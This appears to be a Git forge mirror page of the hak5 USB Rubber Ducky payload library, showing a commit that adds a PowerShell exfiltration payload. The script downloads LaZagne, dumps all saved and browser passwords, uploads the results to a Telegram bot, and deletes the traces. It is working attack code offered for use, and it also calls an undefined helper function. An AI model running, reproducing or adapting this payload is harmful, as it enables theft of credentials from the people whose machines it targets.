hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create payload.ps1

pull/410/head
Mr. Proxy 2023-12-18 02:00:26 +01:00 committed by GitHub
parent 905485f7f3
commit 6da8967591
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 62 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

62
payloads/library/exfiltration/Lazagne-Exfil/payload.ps1 Normal file
View File

@ -0,0 +1,62 @@
[Console]::OutputEncoding = [System.Text.Encoding]::UTF8
# Download LaZagne and execute it
$Test = "C:\temp"
Start-BitsTransfer -Source "https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe" -Destination "$Test/l.exe"
Set-Location $Test
Start-Sleep -Milliseconds 15000
.\l.exe all -vv > "$env:computername.txt"; .\l.exe browsers -vv >> "$env:computername.txt"
# Send the result file to a Telegram bot
# $bt = "bot-token"
# $ci = "chat-id"
$ResultFile = "$Test\$env:computername.txt"
try {
# Create a byte array from the file
$FileStream = [System.IO.File]::OpenRead($ResultFile)
$FileBytes = [byte[]]::new($FileStream.Length)
$FileStream.Read($FileBytes, 0, $FileBytes.Length)
$FileStream.Close()
# Define the boundary for multipart form-data
$boundary = [System.Guid]::NewGuid().ToString()
$LF = "`r`n"
# Construct the multipart form-data content
$BodyLines = @(
"--$boundary",
"Content-Disposition: form-data; name=`"chat_id`"",
"",
$ci,
"--$boundary",
"Content-Disposition: form-data; name=`"document`"; filename=`"$($ResultFile)`"",
"Content-Type: application/octet-stream",
"",
[System.Text.Encoding]::GetEncoding("iso-8859-1").GetString($FileBytes),
"--$boundary--",
""
) -join $LF
# Convert the body to a byte array
$BodyBytes = [System.Text.Encoding]::GetEncoding("iso-8859-1").GetBytes($BodyLines)
# Send the request to the Telegram API
$TelegramAPI = "https://api.telegram.org/bot$bt/sendDocument"
$Response = Invoke-RestMethod -Uri $TelegramAPI -Method Post -ContentType "multipart/form-data; boundary=$boundary" -Body $BodyBytes
Write-Host "File sent to Telegram successfully."
} catch {
Write-Host "Failed to send file to Telegram. Error: $_"
}
# Send the result file
Send-TelegramFile -BotToken $bt -ChatID $ci -FilePath $ResultFile
# Cleanup leftover files
Remove-Item $ResultFile, "$Test/l.exe" -Force -ErrorAction SilentlyContinue
# Exit
Start-Sleep -Milliseconds 2500
exit